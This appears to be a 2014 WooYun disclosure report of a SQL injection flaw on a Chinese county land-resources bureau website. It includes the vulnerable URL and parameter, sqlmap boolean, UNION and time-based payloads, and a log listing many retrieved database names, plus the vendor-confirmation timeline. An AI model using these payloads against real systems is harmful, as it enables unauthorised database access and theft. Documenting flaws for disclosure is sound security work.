当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-058350

漏洞标题:延津县国土资源局sql注入漏洞

相关厂商:延津县国土资源局

漏洞作者: bitcoin

提交时间:2014-04-25 11:45

修复时间:2014-06-09 11:46

公开时间:2014-06-09 11:46

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-04-25: 细节已通知厂商并且等待厂商处理中
2014-04-30: 厂商已经确认,细节仅向厂商公开
2014-05-10: 细节向核心白帽子及相关领域专家公开
2014-05-20: 细节向普通白帽子公开
2014-05-30: 细节向实习白帽子公开
2014-06-09: 细节向公众公开

简要描述:

延津县国土资源局sql注入漏洞

详细说明:

注入点:
http://www.yjxgtj.gov.cn/lm.php?typeid=14
对参数typeid过滤不严,导致注入
sqlmap跑起来
Place: GET
Parameter: typeid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: typeid=14 AND 3406=3406
Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: typeid=-5365 UNION ALL SELECT NULL,CONCAT(0x717a78
575a594848,0x7169756371),NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: typeid=14 AND SLEEP(5)
web application technology: PHP 5.2.6, Apache 2.2.8
back-end DBMS: MySQL 5.0.11
[00:05:08] [INFO] fetching database names
[00:05:15] [INFO] the SQL query used returns 1829 entries
[00:05:15] [INFO] retrieved: "information_schema"
[00:05:16] [INFO] retrieved: "91zxyy"
[00:05:16] [INFO] retrieved: "abcdeft"
[00:05:16] [INFO] retrieved: "acqz"
[00:05:16] [INFO] retrieved: "ada"
[00:05:16] [INFO] retrieved: "adys"
[00:05:17] [INFO] retrieved: "ajls"
[00:05:17] [INFO] retrieved: "anboqizhong"
[00:05:17] [INFO] retrieved: "anda"
[00:05:17] [INFO] retrieved: "anda_huiyuan"
[00:05:17] [INFO] retrieved: "anda_mfy"
[00:05:18] [INFO] retrieved: "anhuidq"
[00:05:18] [INFO] retrieved: "anj"
[00:05:18] [INFO] retrieved: "annm"
[00:05:18] [INFO] retrieved: "antaijt"
[00:05:18] [INFO] retrieved: "anxin"
[00:05:19] [INFO] retrieved: "aokai"
[00:05:19] [INFO] retrieved: "aoxin"
[00:05:19] [INFO] retrieved: "apmcweihua"
[00:05:19] [INFO] retrieved: "aq_data"
[00:05:19] [INFO] retrieved: "axnjxl"
[00:05:20] [INFO] retrieved: "aybaihe"
[00:05:20] [INFO] retrieved: "aybhsj"
[00:05:20] [INFO] retrieved: "aycjthj"
[00:05:20] [INFO] retrieved: "ayclqm"
[00:05:20] [INFO] retrieved: "aycpwz"
[00:05:21] [INFO] retrieved: "aycwly"
[00:05:21] [INFO] retrieved: "aydlky"
[00:05:21] [INFO] retrieved: "aydryj"
[00:05:21] [INFO] retrieved: "ayfk"
[00:05:21] [INFO] retrieved: "ayfrsm"
[00:05:22] [INFO] retrieved: "ayfsdhb"
[00:05:22] [INFO] retrieved: "ayfsdjx"
[00:05:22] [INFO] retrieved: "ayfuda"
[00:05:22] [INFO] retrieved: "ayfytx"
[00:05:22] [INFO] retrieved: "ayfzm"
[00:05:23] [INFO] retrieved: "aygfny"
[00:05:23] [INFO] retrieved: "aygjjs"
[00:05:23] [INFO] retrieved: "aygl"
[00:05:23] [INFO] retrieved: "aygrwz"
[00:05:23] [INFO] retrieved: "aygtgt"
[00:05:24] [INFO] retrieved: "aygxsm"
[00:05:24] [INFO] retrieved: "ayhayy"
[00:05:24] [INFO] retrieved: "ayhcbz"
[00:05:24] [INFO] retrieved: "ayhfgy"
[00:05:39] [INFO] retrieved: "ayhpkj"
[00:05:39] [INFO] retrieved: "ayhtqsm"
[00:05:39] [INFO] retrieved: "ayhuayu"
[00:05:40] [INFO] retrieved: "ayhxgc"
[00:05:40] [INFO] retrieved: "ayhxjc"
[00:05:40] [INFO] retrieved: "ayjc"
[00:05:40] [INFO] retrieved: "ayjdgt"
[00:05:40] [INFO] retrieved: "ayjjhq"
[00:05:41] [INFO] retrieved: "ayjljx"
[00:05:41] [INFO] retrieved: "ayjlsw"
[00:05:41] [INFO] retrieved: "ayjsdsm"
[00:05:41] [INFO] retrieved: "ayjuding"
[00:05:42] [INFO] retrieved: "ayjxsb"
[00:05:42] [INFO] retrieved: "ayjxyjs"
[00:05:42] [INFO] retrieved: "ayjxyjseng"
[00:05:42] [INFO] retrieved: "ayjydq"
[00:05:42] [INFO] retrieved: "ayjysl"
[00:05:43] [INFO] retrieved: "ayjywz"
[00:05:43] [INFO] retrieved: "aykaidi"
[00:05:43] [INFO] retrieved: "aykbltl"
[00:05:43] [INFO] retrieved: "ayldsh"
[00:05:43] [INFO] retrieved: "aylhyj"
[00:05:44] [INFO] retrieved: "aylyxg"
[00:05:44] [INFO] retrieved: "aymgy"
[00:05:44] [INFO] retrieved: "aymswy"
[00:05:44] [INFO] retrieved: "aypjtxw"
[00:05:44] [INFO] retrieved: "ayptf"
[00:05:45] [INFO] retrieved: "aypymy"
[00:05:45] [INFO] retrieved: "ayqitian"
[00:05:45] [INFO] retrieved: "ayqs"
[00:05:45] [INFO] retrieved: "ayrfjxc"
[00:05:45] [INFO] retrieved: "ayrysm"
[00:05:46] [INFO] retrieved: "ayshgt"
[00:05:46] [INFO] retrieved: "ayshsm"
[00:05:46] [INFO] retrieved: "ayshuangzheng"
[00:05:46] [INFO] retrieved: "ayslfs"
[00:05:46] [INFO] retrieved: "aysxqc"
[00:05:47] [INFO] retrieved: "aysysm"
[00:05:47] [INFO] retrieved: "aysywz"
[00:05:47] [INFO] retrieved: "aytcjn"
[00:05:47] [INFO] retrieved: "aythkt"
[00:05:47] [INFO] retrieved: "aywqqz"
[00:05:48] [INFO] retrieved: "aywsgt"
[00:05:48] [INFO] retrieved: "aywtjx"
[00:05:48] [INFO] retrieved: "ayxinyuan"
[00:05:48] [INFO] retrieved: "ayxsjx"
[00:05:49] [INFO] retrieved: "ayxys"
[00:05:49] [INFO] retrieved: "ayybnj"
[00:05:49] [INFO] retrieved: "ayyh"
[00:05:49] [INFO] retrieved: "ayyhdj"
[00:05:49] [INFO] retrieved: "ayyhwz"
[00:05:50] [INFO] retrieved: "ayyihai"
[00:05:50] [INFO] retrieved: "ayyxwz"
[00:05:50] [INFO] retrieved: "ayyxxs"
[00:05:50] [INFO] retrieved: "ayzhongke"
[00:05:50] [INFO] retrieved: "ayzlgy"
[00:05:51] [INFO] retrieved: "ayzxqc"
[00:05:51] [INFO] retrieved: "ayzzgy"
[00:05:51] [INFO] retrieved: "ayzzyy"
[00:05:51] [INFO] retrieved: "azfm"
[00:05:51] [INFO] retrieved: "baay"
[00:05:52] [INFO] retrieved: "bafysy"
[00:05:52] [INFO] retrieved: "bajx"
[00:05:52] [INFO] retrieved: "bangzhuta_pig"
[00:05:52] [INFO] retrieved: "bayx"
[00:05:52] [INFO] retrieved: "bbch"
[00:05:53] [INFO] retrieved: "bdf"
[00:05:53] [INFO] retrieved: "bdsl"
[00:05:53] [INFO] retrieved: "bdszn"
[00:05:53] [INFO] retrieved: "bdyl"
[00:05:53] [INFO] retrieved: "beifangjx"
[00:05:54] [INFO] retrieved: "beilite"
[00:05:54] [INFO] retrieved: "bengye"
[00:05:54] [INFO] retrieved: "bfby"
[00:05:54] [INFO] retrieved: "bfjx"
[00:05:54] [INFO] retrieved: "bfnh"
[00:05:55] [INFO] retrieved: "bgzdq"
[00:05:55] [INFO] retrieved: "bhks"
[00:05:55] [INFO] retrieved: "bideli"
[00:05:55] [INFO] retrieved: "bidelieng"
一共1829张表,就不一一跑了!

漏洞证明:

如上

修复方案:

过滤

版权声明:转载请注明来源 bitcoin@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2014-04-30 09:47

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给河南分中心处置。

最新状态:

暂无